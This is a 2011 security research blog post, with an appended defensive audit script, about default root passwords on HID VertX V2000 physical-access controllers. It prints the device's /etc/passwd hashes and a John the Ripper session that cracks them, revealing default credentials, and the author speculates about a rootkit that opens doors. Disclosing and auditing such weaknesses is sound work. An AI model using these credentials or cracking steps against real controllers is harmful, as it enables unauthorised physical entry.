Tuesday, July 19, 2011

HID VertX V2000 Default Password

In my last post I showed you how to identify HID VertX controllers on the network. Once you identify them, the next step is to figure out how to gain access. That's not really difficult, since they have a default password set for the root account. The VertX controller is primarily managed via the web interface, which relies on the admin account for authentication. From this web interface you can change the password on the admin account, but there is never any mention of the root account.

The system has Telnet, HTTP, and FTP enabled by default, all of which rely on /etc/passwd for authentication. User manuals say to use the admin account for everything, but if you look at management software provided by third parties, you'll see a lot of them use this root account for upgrading firmware and remote configuration.

As mentioned in my previous article, these systems handle physical proximity card access. Since they run Linux, I'm hoping I can find the processes that are responsible for relaying the card data from the reader to the backend, and the processes responsible for doing fun stuff like opening doors. If I can, then I bet writing a rootkit to do my bidding wouldn't be all that hard :)

Here are the goodies:


[root@VertXController /]5748# cat /etc/passwd
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:Administrator:/:/bin/sh
nobody:*:99:99:Nobody:/:
modem1:$1$$Y9rDiTVKDBq0qyRvfJnpd/:500:503:Linux User,,,:/:/bin/sh
router1:$1$$8gZZvhvWWFKJ7whpMxbQn/:501:503:Linux User,,,:/:/bin/sh
admin:$1$$qRPK7m23GJusamGpoGLby/:502:504:Linux User,,,:/:/bin/sh


The password is a tough one:


root@bt:/pentest/passwords/john# ./john vertx.passwd
Loaded 4 password hashes with no different salts (FreeBSD MD5 [32/32])
router1 (router1)
modem1 (modem1)
(admin)
pass (root)
guesses: 4 time: 0:00:00:03 100.00% (2) (ETA: Thu Jul 14 15:00:01 2011) c/s: 9390 trying: pass
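
A defender-side audit for the weaknesses visible in the listing above (hashes kept in /etc/passwd itself, MD5-crypt, and an empty salt on every account), as an added example that is not part of the original post. The function names and finding labels are assumptions of this sketch; the sample input is the passwd listing from the post.

```python
from collections import Counter

# Sample input: the /etc/passwd listing shown in the post above.
SAMPLE_PASSWD = """\
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:Administrator:/:/bin/sh
nobody:*:99:99:Nobody:/:
modem1:$1$$Y9rDiTVKDBq0qyRvfJnpd/:500:503:Linux User,,,:/:/bin/sh
router1:$1$$8gZZvhvWWFKJ7whpMxbQn/:501:503:Linux User,,,:/:/bin/sh
admin:$1$$qRPK7m23GJusamGpoGLby/:502:504:Linux User,,,:/:/bin/sh
"""
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
WEAK = {"md5crypt", "descrypt"}

def parse_hash(field):
    """Return (scheme, salt) for a crypt(3) hash, or None if the field holds no hash."""
    if field in ("", "x") or field[0] in "*!":
        return None  # empty, shadowed ("x"), or locked
    if not field.startswith("$"):
        return ("descrypt", field[:2])  # traditional DES crypt: 2-char salt prefix
    parts = field.split("$")  # "$1$salt$digest" -> ["", "1", "salt", "digest"]
    if len(parts) < 4:
        return ("unknown", None)
    salt = parts[3] if parts[2].startswith("rounds=") else parts[2]
    return (SCHEMES.get(parts[1], "unknown"), salt)

def audit_passwd(text):
    """Return {user: [findings]} for accounts whose hash is stored in passwd itself."""
    rows = [l.split(":") for l in text.splitlines() if l.strip() and not l.startswith("#")]
    parsed = {r[0]: (r, parse_hash(r[1])) for r in rows if len(r) >= 7}
    salt_use = Counter(p[1] for _, p in parsed.values() if p)
    report = {}
    for user, (row, p) in parsed.items():
        if p is None:
            continue
        scheme, salt = p
        findings = ["hash in world-readable /etc/passwd (not shadowed)"]
        if scheme in WEAK:
            findings.append("weak scheme: " + scheme)
        if salt == "":
            findings.append("empty salt")
        elif salt and salt_use[salt] > 1:
            findings.append("salt shared with other accounts")
        if row[2] == "0":
            findings.append("UID 0")
        report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit_passwd(SAMPLE_PASSWD).items():
        print(user + ": " + "; ".join(findings))
```

Run against a copy of a device's passwd file, any account it reports has a hash that every local user and every service reading the file can see.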

1 comment:

  1. tell hw to reset the HID machine from reader mode to configurator mode!!!!!!!!!
